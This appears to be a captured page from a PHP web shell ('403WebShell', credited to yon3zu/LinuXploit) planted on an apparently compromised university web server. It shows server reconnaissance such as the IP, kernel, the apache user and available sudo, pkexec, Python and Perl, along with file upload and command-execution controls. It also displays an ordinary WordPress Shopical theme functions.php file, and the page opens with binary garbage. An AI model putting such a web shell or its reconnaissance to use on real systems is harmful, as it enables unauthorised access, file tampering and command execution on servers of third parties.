h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/wp-content/themes/shopical/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wp-content/themes/shopical//functions.php
<?php
/**
 * Shopical functions and definitions
 *
 * @link https://developer.wordpress.org/themes/basics/theme-functions/
 *
 * @package Shopical
 */

if (!function_exists('shopical_setup')) :
    /**
     * Sets up theme defaults and registers support for various WordPress features.
     *
     * Note that this function is hooked into the after_setup_theme hook, which
     * runs before the init hook. The init hook is too late for some features, such
     * as indicating support for post thumbnails.
     */
    function shopical_setup()
    {
        /*
         * Make theme available for translation.
         * Translations can be filed in the /languages/ directory.
         * If you're building a theme based on Shopical, use a find and replace
         * to change 'shopical' to the name of your theme in all the template files.
         */
        load_theme_textdomain('shopical', get_template_directory() . '/languages');

        // Add default posts and comments RSS feed links to head.
        add_theme_support('automatic-feed-links');

        /*
         * Let WordPress manage the document title.
         * By adding theme support, we declare that this theme does not use a
         * hard-coded <title> tag in the document head, and expect WordPress to
         * provide it for us.
         */
        add_theme_support('title-tag');

        /*
         * Enable support for Post Thumbnails on posts and pages.
         *
         * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/
         */
        add_theme_support('post-thumbnails');

        // Add featured image sizes
        add_image_size('shopical-slider-full', 1024, 550, true); // width, height, crop
        add_image_size('shopical-featured', 1024, 0, false); // width, height, crop
        add_image_size('shopical-medium-center', 936, 897, true); // width, height, crop
        add_image_size('shopical-medium-slider', 720, 450, true); // width, height, crop
        add_image_size('shopical-thumbnail', 450, 410, true); // width, height, crop

        /*
     * Enable support for Post Formats on posts and pages.
     *
     * @link https://developer.wordpress.org/themes/functionality/post-formats/
     */
        add_theme_support('post-formats', array('image', 'video'));

        // This theme uses wp_nav_menu() in one location.
        register_nav_menus(array(
            'aft-primary-nav' => esc_html__('Primary Menu', 'shopical'),
            'aft-social-nav' => esc_html__('Social Menu', 'shopical'),
            'aft-top-nav' => esc_html__('Top Menu', 'shopical'),
            'aft-footer-nav' => esc_html__('Footer Menu', 'shopical'),
        ));

        /*
         * Switch default core markup for search form, comment form, and comments
         * to output valid HTML5.
         */
        add_theme_support('html5', array(
            'search-form',
            'comment-form',
            'comment-list',
            'gallery',
            'caption',
        ));

        // Set up the WordPress core custom background feature.
        add_theme_support('custom-background', apply_filters('shopical_custom_background_args', array(
            'default-color' => 'ffffff',
            'default-image' => '',
        )));

        // Add theme support for selective refresh for widgets.
        add_theme_support('customize-selective-refresh-widgets');

        /**
         * Add support for core custom logo.
         *
         * @link https://codex.wordpress.org/Theme_Logo
         */
        add_theme_support('custom-logo', array(
            'height' => 250,
            'width' => 250,
            'flex-width' => true,
            'flex-height' => true,
        ));

        /*theme updater*/


    }
endif;
add_action('after_setup_theme', 'shopical_setup');

/**
 * Set the content width in pixels, based on the theme's design and stylesheet.
 *
 * Priority 0 to make it available to lower priority callbacks.
 *
 * @global int $content_width
 */
function shopical_content_width()
{
    // This variable is intended to be overruled from themes.
    // Open WPCS issue: {@link https://github.com/WordPress-Coding-Standards/WordPress-Coding-Standards/issues/1043}.
    // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedVariableFound
    $GLOBALS['content_width'] = apply_filters('shopical_content_width', 640);
}

add_action('after_setup_theme', 'shopical_content_width', 0);

/**
 * Demo export/import
 *
 * Eventually, some of the functionality here could be replaced by core features.
 *
 * @package Shopical
 */
if (!function_exists('shopical_ocdi_files')) :
    /**
     * OCDI files.
     *
     * @since 1.0.0
     *
     * @return array Files.
     */
    function shopical_ocdi_files()
    {

        return apply_filters('aft_demo_import_files', array(
            array(

                'import_file_name' => esc_html__('Shopical Default', 'shopical'),
                'local_import_file' => trailingslashit(get_template_directory()) . 'demo-content/default/shopical.xml',
                'local_import_widget_file' => trailingslashit(get_template_directory()) . 'demo-content/default/shopical.wie',
                'local_import_customizer_file' => trailingslashit(get_template_directory()) . 'demo-content/default/shopical.dat',
                'import_preview_image_url'     => trailingslashit( get_template_directory_uri() ) . 'demo-content/assets/Shopical-demo-preview.jpg',
                'preview_url' => 'https://demo.afthemes.com/shopical/',
            ),

            array('import_file_name' => esc_html__('Gadgets', 'shopical'),
                'local_import_file' => trailingslashit(get_template_directory()) . 'demo-content/gadgets/shopical.xml',
                'local_import_widget_file' => trailingslashit(get_template_directory()) . 'demo-content/gadgets/shopical.wie',
                'local_import_customizer_file' => trailingslashit(get_template_directory()) . 'demo-content/gadgets/shopical.dat',
                'import_preview_image_url'     => trailingslashit( get_template_directory_uri() ) . 'demo-content/assets/Shopical-demo-preview-gadgets.jpg',
                'preview_url' => 'https://demo.afthemes.com/shopical/gadgets/',
            ),
            array('import_file_name' => esc_html__('Automobile', 'shopical'),
                'local_import_file' => trailingslashit(get_template_directory()) . 'demo-content/automobile/shopical.xml',
                'local_import_widget_file' => trailingslashit(get_template_directory()) . 'demo-content/automobile/shopical.wie',
                'local_import_customizer_file' => trailingslashit(get_template_directory()) . 'demo-content/automobile/shopical.dat',
                'import_preview_image_url'     => trailingslashit( get_template_directory_uri() ) . 'demo-content/assets/Shopical-demo-preview-automobile.jpg',
                'preview_url' => 'https://demo.afthemes.com/shopical/automobile/',
            ),

        ));
    }
endif;
add_filter('pt-ocdi/import_files', 'shopical_ocdi_files');


/**
 * function for google fonts
 */
if (!function_exists('shopical_fonts_url')):

    /**
     * Return fonts URL.
     *
     * @since 1.0.0
     * @return string Fonts URL.
     */
    function shopical_fonts_url()
    {

        $fonts_url = '';
        $fonts = array();
        $subsets = 'latin,latin-ext';

        /* translators: If there are characters in your language that are not supported by Oswald, translate this to 'off'. Do not translate into your own language. */
        if ('off' !== _x('on', 'Source Sans Pro font: on or off', 'shopical')) {
            $fonts[] = 'Source+Sans+Pro:400,400i,700,700i';
        }

        /* translators: If there are characters in your language that are not supported by Lato, translate this to 'off'. Do not translate into your own language. */
        if ('off' !== _x('on', 'Montserrat font: on or off', 'shopical')) {
            $fonts[] = 'Montserrat:400,700';
        }

        if ($fonts) {
            $fonts_url = add_query_arg(array(
                'family' => urldecode(implode('|', $fonts)),
                'subset' => urldecode($subsets),
            ), 'https://fonts.googleapis.com/css');
        }
        return $fonts_url;

    }
endif;

/**
 * Load Init for Hook files.
 */
require get_template_directory() . '/inc/custom-style.php';

/**
 * Enqueue scripts and styles.
 */
function shopical_scripts()
{

    $min = defined('SCRIPT_DEBUG') && SCRIPT_DEBUG ? '' : '.min';
    wp_enqueue_style('bootstrap', get_template_directory_uri() . '/assets/bootstrap/css/bootstrap' . $min . '.css');
    wp_enqueue_style('font-awesome', get_template_directory_uri() . '/assets/font-awesome/css/font-awesome' . $min . '.css');
    wp_enqueue_style('owl-carousel', get_template_directory_uri() . '/assets/owl-carousel-v2/assets/owl.carousel' . $min . '.css');
    wp_enqueue_style('owl-theme-default', get_template_directory_uri() . '/assets/owl-carousel-v2/assets/owl.theme.default.css');
    wp_enqueue_style('sidr', get_template_directory_uri() . '/assets/sidr/css/jquery.sidr.dark.css');


    wp_enqueue_script('matchheight', get_template_directory_uri() . '/assets/jquery-match-height/jquery.matchHeight' . $min . '.js', array('jquery'), '', true);


    $fonts_url = shopical_fonts_url();

    if (!empty($fonts_url)) {
        wp_enqueue_style('shopical-google-fonts', $fonts_url, array(), null);
    }


    /**
     * Load WooCommerce compatibility file.
     */
    if (class_exists('WooCommerce')) {
        wp_enqueue_style('shopical-woocommerce-style', get_template_directory_uri() . '/woocommerce.css');

        $font_path = WC()->plugin_url() . '/assets/fonts/';
        $inline_font = '@font-face {
			font-family: "star";
			src: url("' . $font_path . 'star.eot");
			src: url("' . $font_path . 'star.eot?#iefix") format("embedded-opentype"),
				url("' . $font_path . 'star.woff") format("woff"),
				url("' . $font_path . 'star.ttf") format("truetype"),
				url("' . $font_path . 'star.svg#star") format("svg");
			font-weight: normal;
			font-style: normal;
		}';

        wp_add_inline_style('shopical-woocommerce-style', $inline_font);
    }
    wp_enqueue_style('shopical-style', get_stylesheet_uri());
    wp_add_inline_style('shopical-style', shopical_custom_style());

    wp_enqueue_script('shopical-navigation', get_template_directory_uri() . '/js/navigation.js', array(), '20151215', true);
    wp_enqueue_script('shopical-skip-link-focus-fix', get_template_directory_uri() . '/js/skip-link-focus-fix.js', array(), '20151215', true);
    if (is_singular() && comments_open() && get_option('thread_comments')) {
        wp_enqueue_script('comment-reply');
    }


    wp_enqueue_script('jquery');
    wp_enqueue_script('jquery-ui-accordion');
    wp_enqueue_script('bootstrap', get_template_directory_uri() . '/assets/bootstrap/js/bootstrap' . $min . '.js', array('jquery'), '', true);
    wp_enqueue_script('sidr', get_template_directory_uri() . '/assets/sidr/js/jquery.sidr' . $min . '.js', array('jquery'), '', true);
    wp_enqueue_script('owl-carousel', get_template_directory_uri() . '/assets/owl-carousel-v2/owl.carousel' . $min . '.js', array('jquery'), '', true);

    if (function_exists('YITH_WCWL')){
        wp_enqueue_script('shopical-wishlist-script', get_template_directory_uri() . '/assets/wishlist.js', array('jquery'), '', true);
    }

    wp_enqueue_script('shopical-script', get_template_directory_uri() . '/assets/script.js', array('jquery', 'jquery-ui-accordion'), '', true);

    $disable_sticky_header_option = shopical_get_option('disable_sticky_header_option');
    if( $disable_sticky_header_option == false ) {
        wp_enqueue_script('shopical-fixed-header-script', get_template_directory_uri() . '/assets/fixed-header-script.js', array('jquery'), '', true);
    }

}

add_action('wp_enqueue_scripts', 'shopical_scripts');


/**
 * Enqueue admin scripts and styles.
 *
 * @since Shopical 1.0.0
 */
function shopical__admin_scripts($hook)
{
    if ('widgets.php' === $hook) {
        wp_enqueue_script('jquery');
        wp_enqueue_media();
        wp_enqueue_script('shopical-widgets', get_template_directory_uri() . '/assets/widgets.js', array('jquery'), '1.0.0', true);
    }
}

add_action('admin_enqueue_scripts', 'shopical__admin_scripts');


/**
 * Implement the Custom Header feature.
 */
require get_template_directory() . '/inc/custom-header.php';

/**
 * Custom template tags for this theme.
 */
require get_template_directory() . '/inc/template-tags.php';

/**
 * Functions which enhance the theme by hooking into WordPress.
 */
require get_template_directory() . '/inc/template-functions.php';

/**
 * Block Functions which enhance the theme by hooking into WordPress.
 */
require get_template_directory() . '/inc/blocks/block-functions.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/customizer/customizer.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/init.php';

/**
 * Load Jetpack compatibility file.
 */
if (defined('JETPACK__VERSION')) {
    require get_template_directory() . '/inc/jetpack.php';
}

/**
 * Load WooCommerce compatibility file.
 */
if (class_exists('WooCommerce')) {
    require get_template_directory() . '/inc/woocommerce.php';
}


/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/ocdi.php';


function print_pre($args)
{
    if ($args) {
        echo "<pre>";
        print_r($args);
        echo "</pre>";
    } else {
        echo "<pre>";
        print_r('Empty');
        echo "</pre>";
    }

}

Youez - 2016 - github.com/yon3zu
LinuXploit